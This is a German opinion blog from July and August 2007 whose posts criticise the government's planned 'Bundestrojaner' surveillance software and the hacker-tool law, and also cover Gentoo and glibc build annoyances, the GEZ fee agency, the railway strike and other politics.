Oh und Gesetze, die werden heutzutage auch nicht gemacht, damit sie Bestand haben. Ein Gesetz ist erst fertig gemacht, wenn die Gerichte sich darüber gestritten haben, wie das eigentlich hätte gemeint sein sollen. Sowas finde ich ja immer zutiefst bedrückend, wenn Leute so wenig Eigen-Anspruch an die Qualität ihres Handwerks haben.
Eines noch: sie meinte, ich solle mich doch mal mit dem Innenexperten der SPD unterhalten, einem gewissen Herr Wiefelspütz. Ich habe da mal eine Mail hingeschrieben, denn wer nicht wagt, der nicht gewinnt. :-)
[l] Lustiges 9/11 Rap-Video: "Selbst gemacht" von "diebandbreite".

Mon Aug 27 2007

[l] So, sehr schön, netzpolitik.org hat die PDFs veröffentlicht, sonst hätte ich das jetzt getan. Hier meine Notizen:
Erst mal muss man sich auf deren Neusprech kalibrieren. Den Bundestrojaner nennen sie jetzt RFS, "remote forensic software", dabei paßt "Schäuphilis" doch so viel besser. Auch an anderer Stelle soll PR-Neusprech die differenzierte Betrachtung des Sachverhaltes verhindern. So unterscheiden sie zwischen "Quellen-TKÜ" und "Online-Durchsuchung". Quellen-TKÜ ist, wenn sie Skype abschnorcheln. Online-Durchsuchung ist, wenn sie Dateien raustragen. Und, so der Gedanke, wenn man das so schön trennt, dann klingt das gleich gar nicht mehr so bedrohlich, und dann müssen sie auch nicht aufpassen, weil wenn sie den Online-Durchsuchung-Trojaner hochladen, dann ist ja klar, daß das keine Quellen-TKÜ war, für die sie eine andere Art der richterlichen Genehmigung brauchen. Ich hatte so ein bißchen den Eindruck, als hielten sie die Quellen-TKÜ schon nach bisherigen Gesetzen für ausreichend legitimiert.
Ich finde es ja gefährlich, wenn wir argumentieren, daß sie keine Ahnung haben und das total unsicher wird. Das ist zwar die Wahrheit, aber wir wollen ja nicht, daß der Trojaner sicher wird, wir wollen daß er gar nicht kommt. Insofern nahm ich mit Belustigung zur Kenntnis, daß das BMI denkt, sie könnten ihre Malware kryptographisch vor Reverse Engineering schützen:
Diese Analyse der RFS (Disassembling) wird jedoch durch die Verwendung kryptographischer Methoden nahezu unmöglich gemacht.
An dieser Stelle hätte man nicht tiefer ins Klo greifen können. Dieser eine Satz reicht, um ihnen sämtliche auch nur in Resten von Fetzen vorhandene Sachkenntnis pauschal abzusprechen. Das ist so grotesk falsch, daß man sich ab dieser Stelle gar nicht mehr inhaltlich mit ihrem Geschreibsel beschäftigen muss, man kann sich auf den Stil beschränken. Und der bietet auch noch genug Angriffsfläche.
So paßt das ja überhaupt nicht mit meinem Bild der Sicherheitsbehörden zusammen, daß sie meine Sicherheit senken anstatt sie zu erhöhen. Daher war eine der Fragen, wie sie denn ihre Spyware gegen Missbrauch durch Dritte sichern wollen. Die Antwort ernüchtert.
Die Sicherheitsbehörden und das Bundesministerium des Innern verfügen grundsätzlich über genügenden Sachverstand.
Sie halten sich schlicht für unfehlbar. Sie setzen da auf Designkriterien und die Vorgabe von Sicherheitsstandards durch das BSI. Von Prüfung, womöglich gar durch unabhängige Experten, steht da nichts. Für die Ausschreibung von Tollcollect galten höhere Sicherheitsanforderungen. Für Glückspielautomaten gelten höhere Sicherheitsanforderungen. Hey, für Wahlcomputer gelten höhere Sicherheitsanforderungen, und ihr wißt ja alle, wie katastrophal unsicher die sind.
Und wenn man unfehlbar ist, dann muss man sich auch keine fiesen Fragen gefallen lassen.
Es ist nicht zu erwarten, dass die RFS entdeckt wird.
Nee, klar. Un-denk-bar.
Die RFS wird so entwickelt, dass von ihr nach dem aktuellen Stand der Technik keine Schadfunktionen ausgehen.
So spricht der Papst, also ist es so. Und überhaupt, was bildet ihr euch eigentlich ein, ihre hinterhältige Spyware als solche zu bezeichnen?!
Mit der Online-Durchsuchung werden keine Personen ausgespäht, sondern relevante Erkenntnisse auf informationstechnischen Systemen erhoben.
Wartet, kommt noch besser!
Bei der hier in Rede stehenden RFS handelt es sich nicht um eine "Spionagesoftware", sondern um ein technisches Mittel zur Datenerhebung.
Das werde ich ab jetzt auch immer sagen. "Herr Richter, das ist doch kein Hackertool, das ist bloß ein technisches Mittel zur Datenerhebung!"
Und überhaupt halten sich die Behörden nicht nur für unfehlbar, sondern auch für grundsätzlich vollständig vertrauenswürdig. Daher stellt sich auch die Frage gar nicht, wie sie da verhindern wollen, daß auf Tagebücher, Krankheitsberichte oder Liebesbriefe zugegriffen wird:
Das Bundeskriminalamt hat beim (verdeckten) Zugriff auf das informationstechnische System kein Interesse an der Kenntnisnahme etwa von Krankheitsberichten, Tagebüchern oder Liebesbriefen.
Und damit ist klar: da wird auch nie jemand gucken. Aber wartet, sie toppen das noch mit der Aussage, das Tagebuch hätte man ja auch bei einer offenen Durchsuchung finden und sichten können, insofern müsse man das ja bei unserer Spyware auch nicht weiter schützen.
Nun sollte man denken, wenn die so von sich selbst überzeugt sind, daß sie dann die Großartigkeit ihrer Software erkennen und sofort verstehen, wieso z.B. die Chinesen sich ihres Trojaners bedienen sollten. Aber neeeiiinnn, das ist völlig undenkbar. Denn:
Speziell wird sichergestellt, dass die Software nicht ohne erheblichen Aufwand dazu veranlasst werden kann, an einen anderen Server als den vom Bundeskriminalamt verwendeten zurückzumelden, und dass die Software weder von außen erkannt noch angesprochen werden kann. Das Entdeckungsrisiko kann durch technische Maßnahmen reduziert werden.
Ich bin mir sicher, das wird sich Sony bei ihrem Rootkit auch gedacht haben. Aber solche Fragen stellen sich nicht, wenn man mit Zauberern zusammen arbeitet. Denn nicht nur ist die Software nicht von außen ansprechbar, das BKA kann sie trotzdem von außen ansprechen:
oder sogar die Beendigung der Maßnahme wegen eines zu hohen Entdeckungsrisikos angezeigt erscheinen lassen, erfolgt die Anweisung an das Programm sich selbst zu deinstallieren.
Zauberei!!! Die können mit einer nicht von außen ansprechbaren Software kommunizieren!
Eine andere Sache ist die Beweissicherheit der aus dem Trojanereinsatz gewonnenen Erkenntnisse. Für die Gefahrenabwehr ist das egal, da kann man auch ohne Beweissicherheit Leute willkürlich in den Karzer sperren, das heißt dann "Unterbindungsgewahrsam". Aber bei Straftaten haben wir ja noch so Reste einer Justiz-Simulation stehen, und da will man von Beweisen, daß sie Beweiskraft haben. Bei Hausdurchsuchungen macht man das so, daß man die Festplatte vor Ort versiegelt, einpackt, dann beim BKA vor Zeugen eine Kopie zieht, und dann auf dieser Kopie arbeitet, damit das Original nicht verändert wird. Das ist beim Trojaner alles nicht gegeben, die Umgebung von dem ist dynamisch und unter der Kontrolle anderer. Selbst wenn wir dem Wirt des Bundesparasiten nicht die nötige Sachkenntnis zubilligen, um da Eingriffe durchzunehmen, so könnte auch ein anderer Trojaner auf dem Rechner sein. Es ist dokumentiert, daß sich Botnet-Trojaner gegenseitig vom Rechner schmeißen, um ihre Überlebenschancen zu verbessern. Ich warte ja auf den Tag, wo die Russenmafia-Trojaner den BKA-Herpes entfernen, weil er sie bei der Arbeit behindert. Und dann ist da natürlich noch die Frage des fernsteuernden BKA-Rechners. Das BKA denkt sich, wenn sie da zwei Beamte haben, die sich gegenseitig bezeugen, daß sie nur Gutes getan haben, ist das alles OK, aber auf dem Rechner könnte ja ein Chinesen-Trojaner sein. Wir haben ja gerade gesehen, daß unsere "grundsätzlich über genügenden Sachverstand" verfügenden Behörden mit ein paar lächerlichen Windows-Trojanern überfordert waren. Und jetzt nehmen wir mal an, der Trojaner-Wirt sagt vor Gericht, er habe den Trojaner bemerkt, und ihm absichtlich irreführende Daten gefüttert. Technisch ist das kein Problem, so einen Trojaner z.B. über Rechnervirtualisierung auch im laufenden Betrieb in ein Holodeck einzusperren und ihn komplett zu verarschen. Wenn der Rechner-Eigentümer zu Protokoll gibt, er habe den Trojaner bemerkt und mit ihm gespielt, ist die Beweiskraft sämtlicher Beweise völlig dahin. Das BKA redet sich ein, man könnte sowas ja dann forensisch feststellen. Dem kann ich nur mit lautem Gelächter antworten.
[l] Ich will euch mal eine Geschichte erzählen. Zum Camp habe ich ein paar Freunde aus den USA eingeladen. Leute, die ich dort getroffen hatte, und mit denen ich mich angefreundet hatte. Ich habe die teilweise überreden müssen, zum Camp zu kommen, teilweise kamen sie auch von ganz alleine. Und wißt ihr, was die mich dieses Jahr gefragt haben? Na?
Die haben mich gefragt, ob es überhaupt noch sicher ist, nach Deutschland einzureisen.
Und die meinten nicht Ausländerfeindlichkeit. Oder die Russenmafia. Oder Skinheads. Die meinten das Hackertoolverbot.
Was habe ich mich da für mein Land geschämt. Kann ich euch gar nicht sagen, wie sehr. Unsere Willkür-Junta hat in ihrer Ignoranz und in ihrer Angst vor Dingen, die sie nicht verstehen, mittelalterlich reagiert und alles als Hexenzeug verboten. Jetzt werden wir bald das machen, was die Ärzte im Mittelalter gemacht haben. Aderlass. Und bei PCs werden wir demnächst Gottesurteile machen. Wenn wir nicht sicher sind, ob der Teufel sie besessen hat, dann werden wir sie töten und reinstallieren. Denn die Werkzeuge zum nachgucken haben wir nicht mehr, und das Verständnis der Dinge kann unter diesen Umständen nicht up-to-date bleiben. Daher wird uns gar nichts übrig bleiben. Einige Firmen machen das ja heute schon so und plätten und reinstallieren alle Rechner am Wochenende, damit sich da nichts einnistet. Ich habe das immer für mittelalterlich und abergläubisch gehalten, aber heute sehe ich, daß das offenbar politisch gewollt sind, daß wir alle inkompetent bleiben. Unsere absolutistischen Herrscher können nicht ertragen, daß jemand von was mehr Ahnung hat also sie, und daher wird das jetzt einfach verboten.
Ich hatte mit einigen meiner Freunde schon Gespräche angefangen, ob wir nicht zusammen in Europa in IT-Security-Fragen kooperieren wollen. Das hat sich jetzt natürlich vollständig geerdet.
Das war echt eine furchtbare Erfahrung, meine Freunde zu erleben, wie sie ihre Laptops frisch reinstalliert hatten, weil sie damit rechneten, am Flughafen durchsucht zu werden. Na klar ist das aus unserer Sicht unrealistisch, aber machen wir es nicht anders herum genau so, wenn wir in die USA fahren? Da habe ich mir immer ein Gefühl der Überlegenheit bewahrt bisher, bei uns könnte sowas nicht passieren. Tja. Da war ich wohl zu optimistisch. Und, mal ganz ehrlich, reparabel ist das nicht. Selbst wenn ich mich jetzt in die Politik begebe und Kanzler werde und alle die Willkürgesetze gekippt werden, ich werde mich nie wieder so fühlen können, als wolle mich die Polizei beschützen. Ich kann die nur noch als die Leute sehen, die mir Trojaner installieren wollten. Das ist nicht reparabel.

Sat Aug 25 2007

[l] Wie man Linux mit einem einfachen Schritt völlig unbrauchbar macht, heute: Gentoo.
Bei einem Update habe ich mir mal gcc-config geupdated, und plötzlich war gcc richtig doll langsam. Einfach nur gcc ohne Argumente aufrufen dauert plötzlich 0,6 Sekunden. WTF? Ich habe also mal ein strace gemacht, um zu gucken, was der da alles aufruft, und haltet euch fest:
1. /bin/sh
2. /usr/bin/gcc-config
3. /sbin/consoletype
4. /bin/stty
5. /usr/bin/python (geht's noch?!)
6. /bin/env
7. /usr/bin/portageq
8. /bin/sh (ja, nochmal)
9. /usr/sbin/prelink (jetzt setzt es aber aus, Leute)
10. /bin/awk (?!?!?)
11. /bin/awk (JA, ZWEI Mal!)
12. /usr/x86_64-pc-linux-gnu/gcc-bin/4.1.2/gcc (den eigentlich gcc)
Der Effekt ist, daß ein dietlibc-Build plötzlich statt 30 Sekunden über fünf Minuten braucht. Und für NICHTS! Es gibt genau keinen Nutzen dieses ganzen Aufwands. Ich glaube ja, das war Penisneid. Da hat ein Gentoo-Fritze gesehen, wie die Debian-Leute da von perl über awk, sed bis zur Shell alles in ihrem Bootprozess drin haben, und hat sich gedacht, hey, das können wir noch schlechter. Gelungen, muss ich sagen. Hut ab. so etwas langsames habe ich noch nie erlebt. Nicht mal Apple sinkt so tief. Dagegen ist BSD ja schnell. Nicht zu fassen. Also, Leute, Gentoo ist auch keine Alternative. Falls da noch jemand Illusionen hatte. Seufz. Man muss echt alles selber machen.

Thu Aug 23 2007

[l] Die GEZ versucht offenbar ihr beschissenes Drückerkolonnen- und Schutzgeldmafia-Image loszuwerden. So weit, so gut. Leider tun sie es, indem Webseitenbetreiber mit Abmahnungen einzuschüchtern versuchen, weil sie nicht ihr PR-Weichspül-Neusprech benutzen.
Das Schreiben des GEZ-Abteilungsleiters "Personal und Recht" enthält dabei nicht nur eine Liste der falschen Begriffe, auch die jeweils korrekten Formulierungen werden genannt. So soll statt "GEZ-Gebühren" korrekt "gesetzliche Rundfunkgebühren" geschrieben werden oder statt "GEZ-Brief" vom "Informationsschreiben der GEZ" und/oder "Schreiben, mit dessen Hilfe der gesetzliche Auskunftsanspruch des § 4 Abs. 5 RGebStV geltend gemacht wird".
Kann man sich gar nicht ausdenken, sowas. Hier ist die Stellungnahme von akademie.de. Ich hoffe ja mal, daß das vor Gericht landet. Und daß der Richter dann ein Schmerzensgeld wegen Zwerchfellüberstrapazierung gegen die GEZ verhängt. Nicht zu fassen.
Also ich zahle ja immer brav meine Gebühren, weil sich mein Fernsehkonsum auch vollständig auf die öffentlich-rechtlichen Sender beschränkt, und ich 3sat und arte gerne weiter bestehen sehen möchte. Aber mal ehrlich, die GEZ muss gesprengt werden. Wir brauchen ein anderes Modell für die Abrechnung. Lustiges Detail am Rande: die GEZ selber verwendet die Begriffe und ist sogar auf Platz 1 bei Google, wenn man danach sucht. Die akadamie.de-Seite belegt das durch einen Screenshot.

Tue Aug 21 2007

[l] Ich werde gelegentlich gefragt, was Hacken ist, und ob man Hacker eigentlich wirklich braucht. Was diese Leute hier gemacht haben, ist Hacken, und das kann sich ja jeder selbst ausrechnen, ob man das hier gebraucht hat.

Fri Aug 17 2007

[l] Für Filmfreunde: Michael Ballhaus wirft hin als Kameramann und packt noch mal so richtig aus.
Der erste Film, den ich in Amerika gedreht habe, war Dear Mr. Wonderful, eine deutsche Produktion mit amerikanischen Schauspielern. Da habe ich erfahren, welche Macht die Gewerkschaften und die Mafia dort haben. Wir drehten in einem Restaurant in New Jersey, da kam eines Tages ein Mann, der hatte auf jeder Seite eine Pistole stecken und sagte, wir könnten jetzt nicht weiterdrehen, wir hätten keinen Deal mit der Gewerkschaft gemacht. Also mussten wir die Dreharbeiten stoppen. Wir sind dann zu Joe Pesci, unserem Hauptdarsteller, gegangen und haben gesagt: »Joe, was machen wir jetzt?« Der hat einen ihm bekannten Mafiaboss im Gefängnis angerufen, woraufhin ein anderer dicker Mann mit zwei Pistolen kam. Der hat dann mit dem Gewerkschafter geredet, und wir konnten wieder drehen.
Und dann, auf die Frage, ob Joe Pesci deshalb in seinen Mafioso-Rollen so gut war, weil er selber einer war:
Während der Dreharbeiten zu Goodfellas gab es auch ganz schöne Spannungen zwischen ihm und De Niro. Da war immer eine Rivalität. Erst wollte Scorsese ihn gar nicht für die Rolle in GoodFellas besetzen. Dann kam Joe und sagte: "Ich muss die Rolle spielen!" Da sagte Marty: "Du bist zu alt — das geht nicht." Sagt er: "Ich kann mich doch liften lassen und so." — "Nein, du bist zu alt!" Dann hat Joe gesagt: "If I don't play this part, I'm gonna kill you!" Und das muss man bei Joe ein bisschen ernst nehmen.

Wed Aug 8 2007

[l] So, es gibt gerade erstmalig Internet auf dem Camp. So halb. ~~Und von echten Experten gemacht~~ (Knick in der Optik, please disregard). Natürlich schieben sich die Leute wieder gegenseitig die Schuld zu, aber hey, who cares.
Gute Tipps für Spätentscheider: bringt Klopapier mit. Es gibt Toiletten, aber die waren gestern ganztägig außer Betrieb, irgendein Kapazitätsproblem mit dem Abwasser. Hat offenbar niemand dem Geländebetreiber mitgeteilt, daß wir da auch viele Menschen erwarten zu dem Camp, und daß man da den Tank mal leeren muss. Offenbar ist die Pumpe auch noch unterdimensioniert gewesen oder sowas, aber heute morgen ging das dann wieder. Nur ist da halt Klopapier chronisch alle. Gut, der erfahrene Camper weiß das und bringt Klopapier mit, den anderen sage ich das hiermit.
Das Hackcenter und die Vorträge finden in ~~Hangars~~ Bogendeckungen statt, die im Gegensatz zu da draußen sehr angenehm kühl sind. Die Essenssituation sah gestern auch nicht gut aus, da gab es überhaupt kein Essen, aber heute haben die aufgebaut und es gibt Hoffnung.
Am Eingang gibt es lange Schlangen, jedenfalls gab es sie gestern, und die Kasse für Tickets aus dem Vorverkauf hatte deutlich mehr Leute in der Schlange, und ging deutlich langsamer pro Person in der Schlange. Hoffentlich optimieren sie da heute noch was.
Ansonsten läßt sich der Gesamteindruck mit folgenden Worten auf den Punkt bringen: voll, heiß, schwül, Mücken. Die Beleuchtung nachts ist sehr cool, komplett mit Flakscheinwerfern im Leuchtturm-Modus auf den ~~Hangar-Dächern~~Bogendeckungen.

Tue Aug 7 2007

[l] Mich fragt gerade jemand, ob der Lokführerstreik nicht Absicht von Mehdorn sei, um den niedrigen Preis bei der Bahnverramschung zu rechtfertigen.
Ich glaube das nicht.
Dem Mehdorn kann der Papierwert der Bahn egal sein, der kriegt ja weiter sein Gehalt. Das sind eher die Politiker, die sich da über den Tisch ziehen lassen, auch wenn der Mehdorn da vermutlich nach Kräften mitmacht.
Meine Theorie, was da gerade passiert, ist folgende: die Bahn versucht gerade mit Gewalt, die Lokführer loszuwerden und durch billige "Aushilfen" und Minijobber zu ersetzen, weil die starke Gewerkschaft bindende Tarifverträge geschlossen hat. Also wenn ich der Mehdorn wäre, würde ich folgendes versuchen:
1. Viele Bahnstrecken zumachen, "rechnet sich nicht" murmeln, und eine unabhängige Untersuchung verhindern. Vorher die teuren Mitarbeiter dorthin versetzen, und dann betriebsbedingte Kündigungen aussprechen, während auf den noch profitablen Strecken Billig-Aushilfen arbeiten. (Das ist natürlich Blödsinn, daß sich die Strecken nicht rechnen, weil Lokalpolitiker das ja subventioniert haben, damit das trotzdem gemacht wird, schließlich ist Bahnanbindung ein Standortfaktor)
2. Dann die Lokführer vor den Kopf stoßen, der Gewerkschaft in Verhandlungen den Stinkefinger zeigen, und das ganze in die Ferienzeit legen (damit die Politik nicht einschreitet, die haben jetzt auch Sommerpause und so betrifft das vor allem Urlauber und nicht Pendler, d.h. ist Ärger aber keine Existenzbedrohung). Dann den provozierten Streik abwarten, denen überhaupt nicht entgegen kommen, und warten. Während des Streiks zahlt die Gewerkschaft die Gehälter.
Der wichtige Punkt an der Stelle: die Bahn ist ein Staatsunternehmen. Die simulieren da zwar am Aktienmarkt herum, aber die Mehrheit gehört dem Bund, und damit besteht kein Risiko einer Pleite, egal wie viel Schaden die jetzt durch diese Aktion machen. D.h. der Mehdorn kann das in Ruhe aussitzen. Überlegt mal, was alleine der neue Hauptbahnhof in Berlin gekostet hat, wie viel Geld der Mehdorn da mal eben im Kamin verheizen konnte. Das bißchen Streik interessiert den nicht.
Für den Mehdorn ist der Streik also keine Bedrohung sondern im Gegenteil eine prima Gelegenheit, die Gewerkschaft in die Pleite zu treiben.
Im Moment heißt es in den Medien immer, wir hätten viel zu wenig Lokführer, und daher sei die Bahn erpressbar. Überlegt mal selber, wie wahrscheinlich das ist. Die Bahn hat ja die Hälfte ihrer Strecken zugemacht, wo sind die denn alle hin, die Lokführer? Frühpension? Meint ihr nicht, die könnte man alle reaktivieren, wenn man ihnen ein bißchen mehr Kohle verspricht, als ihre Pension auszahlt? Ich weiß ja nicht, wie viel Pension die da kriegen, aber viel wird es nicht sein.

Thu Aug 2 2007

[l] Auch die Kriminellen müssen ihre Organisationen downsizen, ihre Kernkompetenzen streamlinen, unnötige Schritte einsparen: Kriminelle in Kolumbien optimieren die Entführung aus der Lösegeld-Erpressung heraus:
Colombian mobile telephone users are being duped by criminals who pose as phone operators and instruct them to turn off their handsets just long enough to demand ransom from their families.
Das kann ich mir schon vorstellen, daß man sich da viel Ungemach ersparen kann. Jetzt müsste es nur noch ein narrensicheres System geben, unnachverfolgbar das Geld zu übergeben… (Danke, Mathias)
[l] Gewinn gesteigert, Rekordergebnis, über ne Milliarde Profit gemacht — völlig klar, da muss Unilever sofort 20.000 Stellen streichen, natürlich vor allem in Europa.

Sat Jul 28 2007

[l] Hier hat mal jemand einen umfangreichen Vergleich Nazis - Schäuble gemacht. Wie erwartet gibt es erstaunlich viele Übereinstimmungen. (Danke, Olaf)

Thu Jul 26 2007

[l] Kiffen macht produktiv!1!!
Wie wenig Menschen eigentlich dafür gemacht sind, über ein halbes Dutzend Kanäle gleichzeitig zu kommunizieren, zeigt auch ein etwas bizarr anmutender Vergleich von Forschern des Londoner King's College. Sie ließen zwei Versuchsgruppen dieselben Aufgaben erledigen. Die eine bekam parallel mehrere E-Mails zugesandt. Die andere Gruppe kiffte vor der Arbeit. Die Kiffer schafften mehr als die Probanden, die gleichzeitig mit ihren E-Mails beschäftigt waren.
Hey, klar, jeder der schon mal Kiffern beim Arbeiten zugesehen hat, wird das sofort bestätigen können. (Danke, Klaus)
[l] Business as usual im Irak: Halliburton hat jetzt in Dubai eine Niederlassung aufgemacht (dort zahlt man keine Steuern), haben ihren Profit verdreifacht, und bei Bechtel sieht man, daß sie nicht mal die Hälfte ihrer Wiederaufbau-Projekte fertig gemacht haben. Das lustige bei Bechtel ist, wie die Bush-Junta dafür gesorgt hat, daß das so läuft:
But the report, by the Special Inspector General for Iraq Reconstruction, an independent agency, places a large share of the blame for the failures on the government overseers at the United States Agency for International Development who administered the contract. The aid agency assigned just two people in Iraq to oversee the giant contract, which included some 24 major projects and 150 subcontractors and stipulated that all invoices be approved or denied in just 10 days.
Und das war der erste Audit für eine westliche Firma im Irak. Da kommt offenbar auch noch ein Halliburton-Blutbad. Ich freu mich schon. Popcorn!

Tue Jul 24 2007

[l] Eine Frage, die sich mir gerade völlig kontextfrei stellt: wie viel Grundgesetzfeindlichkeit müssen Ex-BND-Chefs eigentlich noch an den Tag stellen, bevor der BND mal zugemacht wird? Ich meine, das ist ja offenbar eh nur eine Lachnummer, eine Tarnorganisation, damit uns keiner ernst nimmt und unser richtiger Geheimdienst ungestört arbeiten kann. Oder? ODER?!
Aber mal ernsthaft, was von Ex-BND-Cheffen in letzter Zeit so an Terror kommt, wieso greift da eigentlich §129a nicht? Warum schleust da niemand V-Männer ein und läßt diesen Laden mal hochgehen? Hanning und dieser Adam, viel deutlicher kann man seine Verfassungsfeindlichkeit ja wohl nicht zu Protokoll geben. Wieso werden da irgendwelchen langhaarigen Hippies die Wohnungen durchwühlt, nur um mal zu gucken, wie die eigentlich organisiert sind, aber diese Gestalten laufen noch frei rum und schwingen verfassungsfeindliche Reden?
[l] Boah, endlich. Habe gerade meine Folien für die beiden Camp-Vorträge fertig gemacht. Also "fertig" halt, so ganz fertig ist man ja nie vor der Veranstaltung. Ich werde da sicher noch ein paar Umstellungen machen und so, und falls noch coole Vorschläge reinkommen, was in den Vorträgen unbedingt Erwähnung finden soll, dann fasse ich die auch noch mal an.
Der Vollständigkeit halber:
- Vortrag 1, am ersten Tag nachts um elf: "A Case Against C++".
- Vortrag 2, am dritten Tag abends um halb zehn: "Know your compiler", da geht es um Optimierungen, die der Compiler macht, und die man daher nicht auch noch mal machen muss/soll.

Sat Jul 21 2007

[l] Wieso stimmen eigentlich überhaupt irgendwelche Abgeordnete für die Online-Durchsuchung, wenn doch so offensichtlich ist, daß das nichts bringt, die Polizei schon jetzt überfordert ist, die Richter das dann nicht verstehen, damit üble Missbrauchspotentiale geschaffen werden, und selbst die Polizei sich da nur verhalten drüber freut? Stellt sich raus, daß der BKA-Chef da eine Horrortour mit Videos von Folter, Kindesmißbrauch, abgeschnitten Köpfen und so weiter gemacht, den Abgeordneten das gezeigt, und dann gesagt, nur mit dem Bundestrojaner und Stasi 2.0 kann man da was machen. Und es funktioniert.
Die Beschreibung meines Gesprächspartners deckt sich mit dem, was mir eine Mitarbeiterin eines CDU-Parlamentariers vor drei Wochen als Antwort zum Thema Online-Durchsuchung per Mail schrieb und danach am Telefon sagte: Sie nannte die in den ersten beiden Abschnitten beschriebenen Verbrechen als Begründungen, warum das BKA neue Kompetenzen benötigt: "Wir haben grauenhafte Fakten!"
Sie war merklich schockiert. Bei ihr hatte die Dramaturgie des Vortrags also genau wie gewünscht gewirkt.
Die sind sich echt für nichts zu schade. (Danke, Hanno)
[l] Die Deutsche Justiz hat offenbar die Schweizer Justiz belogen, um eine Rechtshilfe im Schreiber-Fall zu kriegen, die Schweizer haben das jetzt rausgefunden, und sind sehr empört, verlangen nicht nur, daß die rausgerückten Unterlagen nicht verwendet werden, sondern auch daß bisher ergangene Urteile auf ihrer Basis rückgängig gemacht werden. Doch so einfach ist das nicht, das ist u.a. eine BGH-Entscheidung und mehrere rechtskräftige Urteile.

Thu Jul 19 2007

[l] Bush schafft mal eben per Executiv-Befehl den fünften Verfassungszusatz ab. Den hier. Wer im Irak den ökonomischen Wiederaufbau stört, oder die politischen Reformen, dann können sie jetzt einfach alle Sachen beschlagnahmen, ohne Gerichtsverfahren. Gut, haben sie ja bei Ausländern eh schon immer einfach so gemacht, aber jetzt triffts halt auch Amis.

Wed Jul 18 2007

[l] Na das ist ja mal wieder großartig. glibc 2.6 kompiliert nicht mehr mit gcc 4.2 für i386. Die Fehlermeldungen referenzieren Symbole, die in den glibc-Sourcen nicht auftauchen, offenbar was gcc-internes. Die Fehler sind in elf/. Mhh, mal gegoogelt, finde ich das Statement hier, also gebe ich -march=i486 an den Compiler weiter, und kriege plötzlich völlig bizarre andere Fehler. Tue ich -m486 rein, dann läuft er weiter, aber stirbt am Ende wieder an den gleichen Symbolen.
Na gut, denke ich mir, guck ich mal in NEWS rein, das ist ja genau die Datei, wo man sowas erwähnt. Was steht da? Gar nichts zum Code in elf oder dem dynamischen Linker. Naja, wäre ja keinen Blog-Eintrag wert, es weiß ja jeder, was für ein Pfuscher das ist, aber dann fand ich das hier von 2004, und da fordert er ja explizit darauf auf, daß man anderswo über ihn meckern soll, und gerne dafür Blogs aufmachen soll. Nun, dafür ist er mir zu unwichtig, daß ich da noch nen Blog aufmachen würde für, aber hey, he had it coming. Ulrich Drepper ist für mich der Anti-Programmierer, der kann noch weniger als dieser Python-Schnösel oder dieser Ruby-Knallkopf. Ich traue den Kerberos- und X11-Leuten mehr Sachkenntnis zu als ihm. Wenn ich einen nennen sollte, der Linux am meisten schadet, ich müsste nicht lange nachdenken. Und bei Redhat ist der Mann auch prächtig aufgehoben, die haben sich gegenseitig verdient.
Hach wie ich das hasse, anderer Leute Bugs fixen zu müssen.
Update: das Problem ging bei mir weg, als ich in sysdeps/i386/i486/bits/atomic.h die Zeile
```
#if __GNUC_PREREQ (4, 1)
```
gegen
```
#if __GNUC_PREREQ (4, 2)
```
tauschte. Saubere Qualitätssicherung, Jungs, das habt ihr wirklich prima gemacht. Pah, wenn man eine neue libc rausbringt, warum sollte man da schon prüfen, ob das mit dem aktuellen gcc funktioniert. Wo kämen wir da hin. Linux muss spannend bleiben!
Aber wartet, kommt noch besser! Die Testsuite fällt auf die Fresse. Fehlermeldung:
```
iconv_prog: malloc.c:2575: do_check_chunk: Assertion `((char*)p) < min_address || ((char*)p) > max_address' failed.
```
Hach, prima!
[l] Während wir noch rätseln, wie Schäubles Todesschwadrone vorher zur Feststellung des Gefährderstatus ihren Bundestrojaner einschläusen, kommt gerade raus, wie das FBI das macht: sie emailen die Spyware einfach. Und der Fall, bei dem das rauskommt, da hat sich das auch gleich so richtig doll gelohnt, da haben sie einen 15jährigen hinter einem Myspace-Account ausfindig gemacht, der eine Bombendrohung gegen seine Schule ausgesprochen hatte. Da sieht man mal, gegen was für krasse Ultra-Kriminelle sie das einsetzen, alles internationale mafiöse Strukturen, Waffenhändler, Drogenschmuggler, und 15jährige Kinder.

Mon Jul 16 2007

[l] Guckt mal, wie toll die Vorratsdatenspeicherung laut einer BKA-Studie helfen soll:
Kronzeuge der Vorwürfe ist ausgerechnet eine Studie des Bundeskriminalamts, nach der die Vorratsdatenspeicherung die durchschnittliche Aufklärungsquote "von derzeit 55 % im besten Fall auf 55,006 %" erhöhen kann. In Irland und in einigen anderen Staaten, in denen es bereits eine Vorratsdatenspeicherung gibt, hatte sie keinen merkbaren Einfluss auf die Kriminalitätsrate. Aus diesen und aus anderen Gründen sei nicht zu erwarten, betonen die Organisationen, dass damit weniger Verbrechen geschehen würden und die Sicherheit der Bevölkerung gestärkt würde.
Boah, 0,006 Prozentpunkte! Gut, das muss natürlich trotzdem gemacht werden, denn es zahlt ja der ISP und nicht der Staat, und wenn das für den Staat kostenlos ist, dann macht man das natürlich auch, wenn es nichts bringt.

Sat Jul 14 2007

[l] Schäuble will §129a auch auf Einzelpersonen aufweiten. 129a ist der Gummiparagraph mit dem sie die G8-Hausdurchsuchungen "begründet" hatten. Der hier. Die Hausdurchsuchungen, die sie nicht gemacht hatten, weil sie konkrete Verdachtsmomente hatten, sondern weil sie mal gucken wollten, was diese Protestierer so für Leute sind. Ja, DIESER Willkür-Paragraph soll erweitert werden.
Achtet auch auf das prima Schäuble-Bild. Ab jetzt macht der Spiegel offenbar nur noch Schäuble-Fotos mit Sith-Lord-Kralle. :-)
Nota bene: Der Besitz von Bombenbauanleitungen macht jemanden zu einem Terroristen.
[l] Lustige Verschwörungstheorie: Die Bushs haben Land in Paraguay gekauft und ziehen sich dahin zurück, wenn ihnen daheim der Prozess gemacht werden soll.

Wed Jul 11 2007

[l] Der Europäische Gerichtshof entscheidet, daß die Al-Aksa-Stiftung von der Terrorliste genommen werden muss, und ihre eingefrorenen Gelder freigegeben werden müssen. Die Al-Aksa Stiftung hatte geklagt, weil man ihnen keine Rechtsmittel gegen die Platzierung auf der Terrorliste eingeräumt hatte. Das haben die Sesselfurzer jetzt von ihrer Arroganz. Und ich finde es sehr schön, daß auch die Al-Aksa-Brigaden vor dem Europäischen Gerichtshof nicht nur ein Verfahren sondern auch Recht kriegen können. Damit hat die EU wieder einen Punkt gutgemacht bei mir.

Tue Jul 10 2007

